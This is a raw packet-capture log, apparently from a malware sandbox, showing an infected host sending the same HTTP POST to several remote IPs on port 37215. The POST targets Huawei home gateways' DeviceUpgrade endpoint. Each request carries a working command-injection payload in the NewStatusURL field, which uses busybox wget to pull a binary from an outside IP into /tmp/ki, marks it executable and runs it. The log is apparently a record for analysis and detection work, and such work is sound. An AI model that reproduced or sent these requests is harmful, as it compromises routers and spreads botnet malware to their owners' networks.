                                                                      Aug 2, 2024 13:17:04.266112089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.938059092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      30192.168.2.1444304156.103.147.2437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.708072901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.266112089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.938059092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      31192.168.2.1433086197.5.144.17337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.369575977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.426193953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.670233965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      32192.168.2.1450764102.182.201.12337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.371119022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.706877947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.194186926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
